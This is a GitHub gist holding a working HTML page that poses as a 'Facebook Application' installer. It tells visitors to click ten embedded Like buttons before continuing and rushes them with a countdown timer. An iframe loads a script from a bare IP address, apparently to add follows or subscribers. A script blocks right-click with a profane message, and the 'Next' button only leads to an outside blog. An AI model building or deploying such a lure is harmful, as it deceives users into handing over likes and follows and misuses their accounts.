Created
November 17, 2013 06:05
-
-
Save karthik333/7509907 to your computer and use it in GitHub Desktop.
The first commented line is your dabblet’s title
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* The first commented line is your dabblet’s title | |
*/ | |
background: #f06; | |
background: linear-gradient(45deg, #f06, yellow); | |
min-height: 100%; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- content to be placed inside <body>…</body> --><html lang="en"> | |
<head> | |
<title>Facebook Application</title> | |
<link href="http://www.congopongo.com/favicon.ico" rel="icon" type="image/x-icon" /> | |
<meta content="Facebook Application [Install Here]." property="og:title" /> | |
<meta content="Facebook Application [Install Here]" property="og:description" /> | |
<meta content="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188113_102552843214579_383918671_n.jpg" property="og:image"> | |
<style type="text/css"> | |
html * { | |
margin: 0; | |
padding: 0; | |
} | |
body { | |
background: #fff; | |
font-family: "lucida grande",tahoma,verdana,arial,sans-serif; | |
} | |
#total { | |
background: #3B5998; | |
height:60px; | |
border-bottom: 1px solid #213b73; | |
padding: 20px 0; | |
font-color: red; | |
text-align: center; | |
font-size: 22px; | |
font-weight: 300; | |
} | |
h2 { | |
font-size: 14px; | |
font-weight: 300; | |
text-align: center; | |
margin-top: 20px; | |
} | |
.style1 { | |
border-width: 0; | |
} | |
.sub-title { | |
font-family: "Lucida Sans", "Lucida Sans Regular", "Lucida Grande", "Lucida Sans Unicode", Geneva, Verdana, sans-serif; | |
text-align: center; | |
font-size: 1.7em; | |
color: #FF0000; | |
} | |
#countdown { | |
font-size: 1.8em; | |
} | |
#mydiv { | |
font-family: "Lucida Sans", "Lucida Sans Regular", "Lucida Grande", "Lucida Sans Unicode", Geneva, Verdana, sans-serif; | |
text-align: center; | |
font-size: 1.7em; | |
color: #FF0000; | |
} | |
#form{ | |
position:relative; | |
top:20px; | |
} | |
#main{ | |
border:1px solid #E0E0E0 ; | |
width:700px; | |
height:500px; | |
} | |
#step{ | |
border:1px solid #E0E0E0 ; | |
width:650px; | |
height:70px; | |
position:relative; | |
top:10px; | |
} | |
#links{ | |
border:1px solid #E0E0E0 ; | |
width:650px; | |
height:390px; | |
} | |
#h3{ | |
text-align:left; | |
background-color:#3B5998; | |
width:120px; | |
height:70px; | |
position:relative; | |
right:41%; | |
border-right:-1px white; | |
} | |
#img{ | |
position:relative; | |
right:40%; | |
bottom:37%; | |
} | |
h3{ | |
color:white; | |
position:relative; | |
top:15px; | |
left:2px; | |
} | |
h5{ | |
position:relative; | |
bottom:45px; | |
} | |
#b{ | |
background-color:#3B5998 ; | |
width:70px; | |
height:40px; | |
position:relative; | |
left:40%; | |
bottom:50px; | |
color:white; | |
} | |
#magic{ | |
position;relative; | |
top:100%; | |
} | |
</style> | |
</head> | |
<div id="total"> | |
<div id="img"><img src="http://i46.tinypic.com/saz5uu.jpg" width="200px" height="100px"/> </div> | |
</div> | |
<body> | |
<div style="font-family: Arial, Helvetica, sans-serif; color: #626669; width: 800px; background: #ededed;"> | |
</div> | |
<script type="text/javascript"> | |
var start = 60; | |
Number.prototype.toMinutesAndSeconds = function() { | |
var nbr = Math.floor(this / 60); | |
return (nbr+":")+(((nbr=(this-(nbr*60)))<10)?"0"+nbr:nbr); | |
} | |
function display(seconds, output) { | |
output.innerHTML = (--seconds).toMinutesAndSeconds(); | |
if(seconds > 0) { | |
window.setTimeout(function(){display(seconds, output)}, 1000); | |
} | |
if(seconds < 11) { | |
document.getElementById("notifier").innerHTML = "Just 10 seconds left"; | |
} | |
if (seconds == 0) { | |
document.getElementById("notifier").innerHTML = "Hurry Up.."; | |
} | |
} | |
display(start, document.getElementById("countdown")); | |
</script> | |
</div> | |
<center> | |
<div style="padding: 0 30px;"> | |
<div style="background: #FFFFFF; padding: 10px;"> | |
<div id="main"> | |
<div id="step"> | |
<div id="h3"> <h3> First Step: </h3> </div> | |
<p><h5> Click all Likes Buttons Then Click On "Next" For Installation </h5> </p> | |
</div> </br> | |
<div id="links"> | |
<span id="magic"> | |
</span> | |
<!--- permanent Like Button Codes BEGIN ---> | |
</br> </br> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/NUVKEKABABAIII&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/pages/Neha-deshmukh/213053178837926&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://m.facebook.com/profile.php?id=392839094141093&refid=5&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/waiting4ayan2&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/TarakBhakthulu&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/pages/Mahesh-babu-fans/539192369493922&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/afriditechnoworld&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/pages/A-Real-Love-Like-a-dream/577127632317589&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/pages/A-Real-Love-Like-a-dream/577127632317589&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/NUVKEKABABAIII&width=50&height=21&colorscheme=light&layout=button_count&action=like&show_faces=true&send=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowTransparency="true"></iframe> | |
<!--------temporary like buttons begin----> | |
<!--- Follow Button Codes BEGIN ---> | |
<iframe src="//66.45.232.195/is.php?id=krishnasai.6931&type=subscribers" scrolling="no" frameborder="0"allowTransparency="true"style="border:none; overflow:hidden; width:105px;height: 20px;"></iframe> | |
</div> | |
<div id="a"> | |
<a id="linkos" href='http://mylatesttricks.blogspot.in/search/label/Facebook%20Apps/'><input type="button" id="b" value="Next" onclick="asd();"/> </div> | |
</a></center></div> | |
</div> | |
</center> | |
<script type='text/javascript'> | |
/*Mensaje que puedes personalizar*/ var mensajeerror = "Fuck YoU Dont Copy me :xD"; if(document.layers) window.captureEvents(Event.MOUSEDOWN); function bloquear(e){ | |
if (navigator.appName == 'Netscape' && ( e.which == 2 || e.which == 3)) { alert(mensajeerror);return false; } | |
if (navigator.appName == 'Microsoft Internet Explorer' && (event.button == 2 || event.button == 3)) { | |
alert(mensajeerror);return false; }} window.onmousedown=bloquear; document.onmousedown=bloquear; | |
function asd(){ | |
var b=document.getElementById('magic'); | |
b.innerHTML="<b> Click All Buttons First If you Do not click This will not work, If you clicked all then wait for a minute.</b>"; | |
} | |
</script> | |
<center><script id="_wauo7b">var _wau = _wau || []; _wau.push(["small", "hlx46s7bxu0e", "o7b"]); | |
(function() {var s=document.createElement("script"); s.async=true; | |
s.src="http://widgets.amung.us/small.js"; | |
document.getElementsByTagName("head")[0].appendChild(s); | |
})();</script> | |
</body> | |
</html> | |
</html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// alert('Hello world!'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"view":"split","fontsize":"100","seethrough":"","prefixfree":"1","page":"all"} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment